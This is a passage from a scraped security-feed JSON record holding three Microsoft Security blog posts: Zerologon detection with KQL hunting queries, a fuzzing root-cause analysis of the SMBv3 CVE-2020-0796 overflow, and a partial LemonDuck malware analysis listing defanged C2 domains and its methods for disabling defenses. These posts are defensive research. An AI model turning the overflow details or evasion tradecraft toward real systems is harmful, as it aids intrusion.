to provide you with the best detection coverage possible for your domain controllers. [Microsoft Defender for Identity](<https://www.microsoft.com/en-us/microsoft-365/security/identity-defender>) along with other [Microsoft 365 Defender](<https://aka.ms/m365d>) solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.\n\n## Here is a sneak peek into our detection lifecycle\n\nWhenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected [WannaCry](<https://docs.microsoft.com/en-us/defender-for-identity/compromised-credentials-alerts#suspected-wannacry-ransomware-attack-external-id-2035>) attacks and with the alert for [Suspected SMB (Server Message Block) packet manipulation](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/lateral-movement-alerts#suspected-smb-packet-manipulation-cve-2020-0796-exploitation---preview-external-id-2406>) (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.\n\nOver the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even if we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.\n\nThis lack of activity changed on September 13, when we triggered a surge in alerts. Simultaneously, this increase in activity was followed by the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.\n\n![Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-1-1.png)\n\n_Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020_\n\nMicrosoft Defender for Identity can detect this vulnerability early on. It covers both the aspects of exploitation and traffic inspection of the Netlogon channel.\n\n![Alert page experience](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-2-1.png)\n\n_Figure 2: Alert page experience_\n\nWith this Microsoft Defender for Identity alert, you will be able to identify:\n\n * The device that attempted the impersonation.\n * The domain controller.\n * The targeted asset.\n * Whether the impersonation attempts were successful.\n\nFinally, customers using [Microsoft 365 Defende](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>)r can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from [Microsoft Defender for Endpoint.](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.\n\n## A close look at some of the earliest ZeroLogon attacks\n\nZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity was originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.\n\n![Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-3.png)\n\n_Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale_\n\nOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.\n\nUsing the @MsftSecIntel Twitter handle, we [publicly shared some file indicators](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoints.\n\n![Placeholder](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-4.png)\n\n## Hunting for ZeroLogon in Microsoft 365 Defender\n\nCombining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. It has logic that constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&CK framework, and machine learning models.\n\nIn this section, we provide an example (in the simplified form of an [advanced hunting query](<https://docs.microsoft.com/en-gb/microsoft-365/security/mtp/advanced-hunting-overview?view=o365-worldwide>)) of how Microsoft 365 Defender correlation logic operates behind-the-scenes to combine alerts, reducing Security Operations Centers (SOC) fatigue and facilitating investigation.\n\nThe following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.\n\n![Placeholder](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-6.png)\n\nFirst, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.\n\n`// Find all Netlogon exploit attempt alerts containing source devices \nlet queryWindow = 3d; \nAlertInfo \n| where Timestamp > ago(queryWindow) \n| where ServiceSource == \"Azure ATP\" \n| where Title == \"Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)\" \n| join (AlertEvidence \n| where Timestamp > ago(queryWindow) \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n) on AlertId \n| summarize by AlertId, DeviceId, Timestamp`\n\nNext, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:\n\n`// Find potential endpoint Netlogon exploit evidence from AlertId \nlet NLAlertId = \"insert alert ID here\"; \nlet lookAhead = 1m; \nlet lookBehind = 6m; \nlet NLEvidence = AlertEvidence \n| where AlertId == NLAlertId \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n| summarize Timestamp=arg_min(Timestamp, *) by DeviceId; \nlet sourceMachine = NLEvidence | distinct DeviceId; \nlet alertTime = todatetime(toscalar(ZLEvidence | distinct Timestamp)); \nDeviceNetworkEvents \n| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead)) \n| where DeviceId in (sourceMachine) \n| where RemotePort == 135 or RemotePort between (49670 .. 49680) \n| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl \n| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl`\n\nThis query can return a result that looks like this:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/Screenshot-125.png)\n\nTying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or from an actual attack.\n\n## Defend against ZeroLogon\n\nLearn more about the [alert here](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/compromised-credentials-alerts#suspected-netlogon-privilege-elevation-attempt-cve-2020-1472-exploitationexternalid2411>), along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.\n\nAlso, feel free to review [our guidance ](<https://support.microsoft.com/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability\n\nCustomers with Microsoft Defender for Endpoint can get additional guidance from[ the threat analytics article ](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsecuritycenter.windows.com%2Fthreatanalytics3%2Fc57607da-fb94-43f3-b8ba-1acda0242900%2Fanalystreport&data=02%7C01%7CDaniel.Naim%40microsoft.com%7C5a14a796515d428cb11608d86545b735%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637370697507756901&sdata=uxd2wKhtSyqr9A2dqhO9D7YW%2F7MgA%2F3o1WnmWjpmCO8%3D&reserved=0>)available in Microsoft Defender Security Center.\n\n## Get started today\n\nAre you just starting your Microsoft Defender for Identity journey? Begin a trial of [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.\n\nJoin the [Microsoft Defender for Identity Tech Community ](<https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/bd-p/AzureAdvancedThreatProtection>)for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.\n\nTo learn more about Microsoft Security solutions [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [Zerologon is now detected by Microsoft Defender for Identity](<https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-30T17:00:20", "type": "mssecure", "title": "Zerologon is now detected by Microsoft Defender for Identity", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2020-11-30T17:00:20", "id": "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "href": "https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-05T21:38:22", "description": "The skyrocketing demand for tools that enable real-time collaboration, remote desktops for accessing company information, and other services that enable remote work underlines the tremendous importance of building and shipping secure products and services. While this is magnified as organizations are forced to adapt to the new environment created by the global crisis, it\u2019s not a new imperative. Microsoft has been investing heavily in security, and over the years our commitment to building proactive security into products and services has only intensified.\n\nTo help deliver on this commitment, we continuously find ways to improve and secure Microsoft products. One aspect of our proactive security work is finding vulnerabilities and fixing them before they can be exploited. Our strategy is to take a holistic approach and drive security throughout the engineering lifecycle. We do this by:\n\n * Building security early into the design of features.\n * Developing tools and processes that proactively find vulnerabilities in code.\n * Introducing mitigations into Windows that make bugs significantly harder to exploit.\n * Having our world-class penetration testing team test the security boundaries of the product so we can fix issues before they can impact customers.\n\nThis proactive work ensures we are continuously making Windows safer and finding as many issues as possible before attackers can take advantage of them. In this blog post we will discuss a recent vulnerability that we proactively found and fixed and provide details on tools and techniques we used, including a new set of tools that we built internally at Microsoft. Our penetration testing team is constantly testing the security boundaries of the product to make it more secure, and we are always developing tools that help them scale and be more effective based on the evolving threat landscape. Our investment in fuzzing is the cornerstone of our work, and we are constantly innovating this tech to keep on breaking new ground.\n\n### Proactive security to prevent the next WannaCry\n\nIn the past few years, much of our team\u2019s efforts have been focused on uncovering remote network vulnerabilities and preventing events like the WannaCry and NotPetya outbreaks. Some bugs we have recently found and fixed include critical vulnerabilities that could be leveraged to exploit common secure remote communication tools like RDP or create ransomware issues like WannaCry: [CVE-2019-1181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181>) and [CVE-2019-1182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1182>) dubbed \"[DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>)\", [CVE-2019-1226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1226>) (RCE in RDP Server), [CVE-2020-0611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611>) (RCE in RDP Client), and [CVE-2019-0787](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0787>) (RCE in RDP client), among others.\n\nOne of the biggest challenges we regularly face in these efforts is the sheer volume of code we analyze. Windows is enormous and continuously evolving 5.7 million source code files, with more than 3,500 developers doing 1,100 pull requests per day in 440 official branches. This rapid cadence and evolution allows us to add new features as well proactively drive security into Windows.\n\nLike many security teams, we frequently turn to fuzzing to help us quickly explore and assess large codebases. Innovations we\u2019ve made in our fuzzing technology have made it possible to get deeper coverage than ever before, resulting in the discovery of new bugs, faster. One such vulnerability is the remote code vulnerability (RCE) in Microsoft Server Message Block version 3 (SMBv3) tracked as CVE-2020-0796 and [fixed](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) on March 12, 2020.\n\nIn the following sections, we will share the tools and techniques we used to fuzz SMB, the root cause of the RCE vulnerability, and relevant mitigations to exploitation.\n\n### Fully deterministic person-in-the-middle fuzzing\n\nWe use a custom deterministic full system emulator tool we call \u201cTKO\u201d to fuzz and introspect Windows components. TKO provides the capability to perform full system emulation and memory snapshottting, as well as other innovations. As a result of its unique design, TKO provides several unique benefits to SMB network fuzzing:\n\n * The ability to snapshot and fuzz forward from any program state.\n * Efficiently restoring to the initial state for fast iteration.\n * Collecting complete code coverage across all processes.\n * Leveraging greater introspection into the system without too much perturbation.\n\nWhile all of these actions are possible using other tools, our ability to seamlessly leverage them across both user and kernel mode drastically reduces the spin-up time for targets. To learn more, check out David Weston\u2019s recent BlueHat IL presentation \u201c[Keeping Windows secure](<https://www.youtube.com/watch?v=NlfZG2wTPZU>)\u201d, which touches on fuzzing, as well as the TKO tool and infrastructure.\n\n### Fuzzing SMB\n\nGiven the ubiquity of SMB and the impact demonstrated by SMB bugs in the past, assessing this network transfer protocol has been a priority for our team. While there have been past audits and fuzzers thrown against the SMB codebase, some of which postdate the current SMB version, TKO\u2019s new capabilities and functionalities made it worthwhile to revisit the codebase. Additionally, even though the SMB version number has remained static, the code has not! These factors played into our decision to assess the SMB client/server stack.\n\nAfter performing an initial audit pass of the code to understand its structure and dataflow, as well as to get a grasp of the size of the protocol\u2019s state space, we had the information we needed to start fuzzing.\n\nWe used TKO to set up a fully deterministic feedback-based fuzzer with a combination of generated and mutated SMB protocol traffic. Our goal for generating or mutating across multiple packets was to dig deeper into the protocol\u2019s state machine. Normally this would introduce difficulties in reproducing any issues found; however, our use of emulators made this a non-issue. New generated or mutated inputs that triggered new coverage were saved to the input corpus. Our team had a number of basic mutator libraries for different scenarios, but we needed to implement a generator. Additionally, we enabled some of the traditional Windows heap instrumentation using verifier, turning on page heap for SMB-related drivers.\n\nWe began work on the SMBv2 protocol generator and took a network capture of an SMB negotiation with the aim of replaying these packets with mutations against a Windows 10, version 1903 client. We added a mutator with basic mutations (e.g., bit flips, insertions, deletions, etc.) to our fuzzer and kicked off an initial run while we continued to improve and develop further.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/05/Figure1-TKO-fuzzing-workflow.png)\n\n_Figure 1. TKO fuzzing workflow_\n\nA short time later, we came back to some compelling results. Replaying the first crashing input with TKO\u2019s kdnet plugin revealed the following stack trace:\n \n \n _> tkofuzz.exe repro inputs\\crash_6a492.txt -- kdnet:conn 127.0.0.1:50002_\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/05/Figure2a-Windbg-stack-trace-of-crash.png)\n\n_Figure 2. Windbg stack trace of crash_\n\nWe found an access violation in _srv2!Smb2CompressionDecompress_.\n\n### Finding the root cause of the crash\n\nWhile the stack trace suggested that a vulnerability exists in the decompression routine, it\u2019s the parsing of length counters and offsets from the network that causes the crash. The last packet in the transaction needed to trigger the crash has _\u2018\\xfcSMB\u2019_ set as the first bytes in its header, making it a [COMPRESSION_TRANSFORM](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0>) packet.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/05/Figure3a-COMPRESSION_TRANSFORM-packet-details.png)\n\n_Figure 3. COMPRESSION_TRANSFORM packet details_\n\nThe SMBv2 COMPRESSION_TRANSFORM packet starts with a COMPRESSION_TRANSFORM_HEADER, which defines where in the packet the compressed bytes begin and the length of the compressed buffer.\n \n \n typedef struct _COMPRESSION_TRANSFORM_HEADER\n \n {\n \n UCHAR\u00a0\u00a0 Protocol[4]; // Contains 0xFC, 'S', 'M', 'B'\n \n ULONG\u00a0\u00a0\u00a0 OriginalMessageSize;\n \n USHORT AlgorithmId;\n \n USHORT Flags;\n \n ULONG Length;\n \n }\n\nIn the _srv2!Srv2DecompressData_ in the graph below, we can find this COMPRESSION_TRANSFORM_HEADER struct being parsed out of the network packet and used to determine pointers being passed to _srv2!SMBCompressionDecompress_.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/05/Figure4a-Srv2DecompressData-graph.png)\n\n_Figure 4. Srv2DecompressData graph_\n\nWe can see that at _0x7e94_, _rax_ points to our network buffer, and the buffer is copied to the stack before the _OriginalCompressedSegmentSize_ and _Length_ are parsed out and added together at _0x7ED7_ to determine the size of the resulting decompressed bytes buffer. Overflowing this value causes the decompression to write its results out of the bounds of the destination _SrvNet_ buffer, in an out-of-bounds write (OOBW).\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/05/Figure5a-overflow-condition.png)\n\n_Figure 5. Overflow condition_\n\nLooking further, we can see that the _Length_ field is parsed into _esi_ at_ 0x7F04_, added to the network buffer pointer, and passed to _CompressionDecompress_ as the source pointer. As _Length_ is never checked against the actual number of received bytes, it can cause decompression to read off the end of the received network buffer. Setting this _Length_ to be greater than the packet length also causes the computed source buffer length passed to _SmbCompressionDecompress_ to underflow at _0x7F18_, creating an out-of-bounds read (OOBR) vulnerability. Combining this OOBR vulnerability with the previous OOBW vulnerability creates the necessary conditions to leak addresses and create a complete remote code execution exploit.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/05/Figure6-underflow-condition.png)\n\n_Figure 6. Underflow condition_\n\n### Windows 10 mitigations against remote network vulnerabilities\n\nOur discovery of the SMBv3 vulnerability highlights the importance of revisiting protocol stacks regularly as our tools and techniques continue to improve over time. In addition to the proactive hunting for these types of issues, the investments we made in the last several years to harden Windows 10 through mitigations like address space layout randomization (ASLR), Control Flow Guard (CFG), InitAll, and hypervisor-enforced code integrity (HVCI) hinder trivial exploitation and buy defenders time to patch and protect their networks.\n\nFor example, turning vulnerabilities like the ones discovered in SMBv3 into working exploits requires finding writeable kernel pages at reliable addresses, a task that requires heap grooming and corruption, or a separate vulnerability in Windows kernel address space layout randomization (ASLR). Typical heap-based exploits taking advantage of a vulnerability like the one described here would also need to make use of other allocations, but Windows 10 [pool hardening helps mitigate](<https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#kernel-pool-protections>) this technique. These mitigations work together and have a cumulative effect when combined, increasing the development time and cost of reliable exploitation.\n\nAssuming attackers gain knowledge of our address space, indirect jumps are mitigated by kernel-mode CFG. This forces attackers to either use data-only corruption or bypass Control Flow Guard via stack corruption or yet another bug. If [virtualization-based security (VBS)](<https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs>) and HVCI are enabled, attackers are further constrained in their ability to map and modify memory permissions.\n\nOn [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default. Secured-core PCs combine virtualization, operating system, and hardware and firmware protection. Along with [Microsoft Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), Secured-core PCs provide end-to-end protection against advanced threats.\n\nWhile these mitigations collectively lower the chances of successful exploitation, we continue to deepen our investment in identifying and fixing vulnerabilities before they can get into the hands of adversaries.\n\n \n\nThe post [Mitigating vulnerabilities in endpoint network stacks](<https://www.microsoft.com/security/blog/2020/05/04/mitigating-vulnerabilities-endpoint-network-stacks/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-05-04T16:00:25", "type": "mssecure", "title": "Mitigating vulnerabilities in endpoint network stacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0787", "CVE-2019-1181", "CVE-2019-1182", "CVE-2019-1226", "CVE-2020-0611", "CVE-2020-0796"], "modified": "2020-05-04T16:00:25", "id": "MSSECURE:7DAEE35F7BA48355264AFE712E62E793", "href": "https://www.microsoft.com/security/blog/2020/05/04/mitigating-vulnerabilities-endpoint-network-stacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n![Diagram showing chain of attacks from the LemonDuck and LemonCat infrastructure, detailing specific attacker behavior common to both and highlight behavior unique to each infra](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/attack-chain.png)\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-1.png)\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-2.png)\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, 